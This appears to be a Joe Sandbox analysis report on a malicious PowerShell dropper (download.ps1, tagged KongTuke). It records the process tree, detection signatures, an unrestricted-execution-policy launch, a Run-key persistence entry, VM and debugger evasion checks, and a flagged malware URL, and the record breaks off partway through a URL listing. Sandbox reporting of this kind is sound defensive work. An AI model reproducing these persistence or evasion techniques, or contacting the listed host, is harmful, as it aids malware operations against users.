Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1570493
MD5:aa53e9e42c8f90023dc846e2cb391fc0
SHA1:7508cfcd899cfe941a85d085d847b74958a93bce
SHA256:4af7ee1bbb06bf40d82f8d6c50d8624caeebd2e61fb2af97d9f8d5fe35c0d3ed
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Opens network shares
Powershell drops PE file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • check.exe (PID: 2792 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
      • check.exe (PID: 1520 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
        • cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 1248 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • WerFault.exe (PID: 2164 cmdline: C:\Windows\system32\WerFault.exe -u -p 1520 -s 892 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • check.exe (PID: 2604 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
    • check.exe (PID: 3608 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
      • cmd.exe (PID: 1532 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4752 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WerFault.exe (PID: 2556 cmdline: C:\Windows\system32\WerFault.exe -u -p 3608 -s 968 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • check.exe (PID: 6584 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
    • check.exe (PID: 5300 cmdline: "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" MD5: 00152720A2C1C6969E3581E2DABC6702)
      • cmd.exe (PID: 4720 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2272 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WerFault.exe (PID: 1656 cmdline: C:\Windows\system32\WerFault.exe -u -p 5300 -s 932 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7160, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7160, TargetFilename: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7160, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://hkinuxb3bz.top/1.php?s=527Avira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.5% probability
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2761324036.00007FF8B83B5000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2749724831.00007FF89F1D2000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000004.00000003.2254086538.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2763315652.00007FF8BFBA4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2206358241.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762439180.00007FF8BA4F5000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2254233123.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2760252195.00007FF8B8277000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2760252195.00007FF8B8277000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2763117904.00007FF8BFB73000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2761899392.00007FF8B8CB6000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2750673646.00007FF89F7A6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2743333905.00007FF89DF9A000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762068252.00007FF8B90EB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762795539.00007FF8BA51D000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2760981184.00007FF8B8319000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2758624413.00007FF89FF78000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: check.exe, 00000004.00000003.2254233123.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2205718666.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.2195204413.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762606642.00007FF8BA503000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: check.exe, 00000005.00000002.2749724831.00007FF89F26A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2748572981.00007FF89EDD5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2750673646.00007FF89F7A6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.2222491102.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2254086538.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2763315652.00007FF8BFBA4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2749724831.00007FF89F26A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762283867.00007FF8B9843000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762068252.00007FF8B90EB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2761734389.00007FF8B8C13000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2744275585.00007FF89E59A000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2741705628.00007FF89D8B4000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2735934243.0000029FD7590000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.2224216053.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.2208243247.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2748572981.00007FF89EDD5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2760756443.00007FF8B82EE000.00000002.00000001.01000000.00000019.sdmp
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7124F83C0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124F9280 FindFirstFileExW,FindClose,4_2_00007FF7124F9280
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712511874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF712511874
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124F9280 FindFirstFileExW,FindClose,5_2_00007FF7124F9280
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124F83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF7124F83C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: Joe Sandbox ViewIP Address: 104.20.23.46 104.20.23.46
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: nodejs.org
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.j(
Source: check.exe, 00000005.00000002.2738851397.0000029FD9F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
Source: check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
Source: check.exe, 00000004.00000003.2208243247.000001C184424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredID
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2260368350.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254679847.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C18442C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, 